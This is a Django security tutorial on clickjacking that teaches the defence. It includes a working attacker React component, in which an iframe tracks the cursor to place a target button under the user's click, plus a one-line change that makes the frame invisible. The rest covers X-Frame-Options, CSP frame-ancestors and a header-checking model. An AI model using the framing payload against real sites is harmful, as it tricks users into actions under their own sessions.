Part 2 of the “Hacking Django” series: part 1, part 3
Clickjacking is an attack where one of your logged-in users visits a malicious website, and that website tricks the user into interacting with your website through an iframe. The click lands on your page with the victim's session, so whatever the button does, it does as that user.
As an example, take the green “create pull request” button, which creates a Pull Request on GitHub as the logged-in user:
Let’s say the malicious website has some nefarious React:
```jsx
import React from 'react';

// Attacker-controlled page. The iframe loads the target site and is
// repositioned on every mouse move so that the target button stays under
// the cursor; the user thinks they are clicking "Some website content".
export default function (props) {
  const [position, setPosition] = React.useState({ clientX: 0, clientY: 0 });

  const updatePosition = event => {
    const { clientX, clientY } = event;
    setPosition({ clientX, clientY });
  };

  React.useEffect(() => {
    document.addEventListener("mousemove", updatePosition, false);
    document.addEventListener("mouseenter", updatePosition, false);
    return () => {
      document.removeEventListener("mousemove", updatePosition);
      document.removeEventListener("mouseenter", updatePosition);
    };
  }, []);

  // The -200 / -650 offsets are tuned so the button inside the framed page
  // sits exactly at the cursor; they depend on the target page's layout.
  return (
    <>
      <iframe
        style={{
          zIndex: 100,
          position: 'absolute',
          top: position.clientY - 200,
          left: position.clientX - 650,
        }}
        src="<path-to-target-website>"
        width="750px"
        height="500px"
      />
      <div>Some website content</div>
    </>
  );
}
```
When one of your logged-in users opens the malicious page, the iframe follows the mouse so that the target button is always under the cursor. When the user clicks, the click lands in the iframe, on your site, with their session.
That version is obvious, since the user can see the iframe, but hiding it is a one-line change: style={{opacity: 0, ...}} makes the frame invisible while it still receives the click. (style={{display: 'none', ...}} would not work for the attacker: an element with display: none is removed from layout and cannot be clicked.) For the demo I used style={{opacity: '0.1', ...}}, otherwise you would see nothing interesting:
Clickjack prevention middleware
The fix is to tell browsers where your pages may be framed. Add django.middleware.clickjacking.XFrameOptionsMiddleware to MIDDLEWARE in settings and set X_FRAME_OPTIONS = 'SAMEORIGIN' (or 'DENY' if nothing on your own site needs to frame the page). Every response then carries an X-Frame-Options header with the value SAMEORIGIN, and modern browsers refuse to render the page inside a frame on any other origin.
Two things to check rather than assume. First, Django's default project template already lists this middleware and, since Django 3.0, X_FRAME_OPTIONS defaults to 'DENY', so the protection is usually on unless someone removed the middleware or loosened the setting; the @xframe_options_exempt decorator switches the header off for a view, so audit any use of it. Second, X-Frame-Options is the legacy mechanism: the Content-Security-Policy frame-ancestors directive supersedes it, browsers honour frame-ancestors in preference when both are present, and Django does not set it for you. SameSite=Lax session cookies (Django's default) also stop a cross-site frame from carrying the session, but that is defence in depth, not a substitute for the header.
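To make the server and browser sides of this concrete, here is an added example (not code from the post and not Django's own implementation) written in plain Python so it runs without Django installed. The Response class, apply_x_frame_options and apply_frame_ancestors are hypothetical stand-ins that mirror what XFrameOptionsMiddleware and a CSP-setting middleware would do; framing_allowed models the decision a modern browser makes from those headers, including the precedence of frame-ancestors over X-Frame-Options, the obsolete ALLOW-FROM value, and the effect of @xframe_options_exempt. The scenario in demo() uses constructed origins.

```python
"""Offline model of clickjacking protection. Added example, not Django code:
the server side mirrors django.middleware.clickjacking.XFrameOptionsMiddleware,
the browser side mirrors how X-Frame-Options and CSP frame-ancestors are
evaluated. Origins below are constructed for the demo."""
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class Response:
    """Hypothetical stand-in for django.http.HttpResponse."""
    headers: dict = field(default_factory=dict)
    xframe_options_exempt: bool = False  # what @xframe_options_exempt sets


def apply_x_frame_options(response, x_frame_options="DENY"):
    """Same rule as Django's middleware: set the header unless the view opted
    out or already set it. Django 3.0+ defaults X_FRAME_OPTIONS to DENY."""
    if response.xframe_options_exempt or "X-Frame-Options" in response.headers:
        return response
    response.headers["X-Frame-Options"] = x_frame_options.upper()
    return response


def apply_frame_ancestors(response, sources=("'self'",)):
    """The modern equivalent. Django has no setting for this; a project adds
    it in its own middleware. Assumed helper, not a Django API."""
    response.headers["Content-Security-Policy"] = "frame-ancestors " + " ".join(sources)
    return response


def origin_of(url):
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def _source_matches(source, page_url, ancestor_url):
    """One CSP source expression against one ancestor document."""
    if source == "'none'":
        return False
    if source == "'self'":
        return origin_of(page_url) == origin_of(ancestor_url)
    ancestor = urlsplit(ancestor_url)
    if source.endswith(":") and "/" not in source:  # scheme-source, e.g. https:
        return ancestor.scheme == source[:-1].lower()
    src = urlsplit(source if "://" in source else "//" + source)
    if src.scheme and src.scheme != ancestor.scheme:
        return False
    if src.port is not None and src.port != ancestor.port:
        return False
    if src.hostname.startswith("*."):
        return ancestor.hostname.endswith(src.hostname[1:])  # subdomains only
    return src.hostname == ancestor.hostname


def framing_allowed(headers, page_url, ancestor_urls):
    """May page_url render inside a frame whose ancestor documents (top-level
    first) are ancestor_urls? frame-ancestors wins over X-Frame-Options; every
    ancestor must pass; no header at all means framing is allowed."""
    csp = headers.get("Content-Security-Policy", "")
    for directive in csp.split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            sources = value.split()
            return all(any(_source_matches(s, page_url, a) for s in sources)
                       for a in ancestor_urls)
    xfo = headers.get("X-Frame-Options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return all(origin_of(a) == origin_of(page_url) for a in ancestor_urls)
    return True  # absent, or an unknown/obsolete value such as ALLOW-FROM, is ignored


def demo():
    """Constructed scenario: app.example serves the page with the button,
    evil.example is the attacker's top-level page."""
    page = "https://app.example/pulls/new"
    attacker = ["https://evil.example/"]
    same_site = ["https://app.example/dashboard"]
    sameorigin = apply_x_frame_options(Response(), "SAMEORIGIN")
    deny = apply_x_frame_options(Response(), "DENY")
    exempt = apply_x_frame_options(Response(xframe_options_exempt=True), "DENY")
    csp = apply_frame_ancestors(Response(), ("'self'", "https://*.partner.example"))
    return {
        "no_header_attacker": framing_allowed({}, page, attacker),              # vulnerable
        "sameorigin_attacker": framing_allowed(sameorigin.headers, page, attacker),
        "sameorigin_self": framing_allowed(sameorigin.headers, page, same_site),
        "deny_self": framing_allowed(deny.headers, page, same_site),
        "exempt_attacker": framing_allowed(exempt.headers, page, attacker),     # opt-out reopens the hole
        "allow_from_obsolete": framing_allowed(
            {"X-Frame-Options": "ALLOW-FROM https://trusted.example"}, page, attacker),
        "csp_partner": framing_allowed(csp.headers, page, ["https://www.partner.example/"]),
        "csp_attacker": framing_allowed(csp.headers, page, attacker),
        "csp_nested": framing_allowed(csp.headers, page, ["https://evil.example/", "https://app.example/"]),
    }


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name:22s} framing allowed: {allowed}")
```

In a real project the equivalent check is a test through Django's test client, asserting that self.client.get("/") carries X-Frame-Options with the value you expect, and that no view you did not mean to exempt is missing it; the exempt_attacker and allow_from_obsolete entries above are the two ways a site ends up framable while appearing to be configured.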
Does your website have security vulnerabilities?
Over time it's easy for security vulnerabilities and tech debt to slip into your codebase. I can check for clickjacking and many other vulnerabilities for free at https://django.doctor. I'm a Django code improvement bot:
If you would prefer security holes not make it into your codebase, I also review pull requests: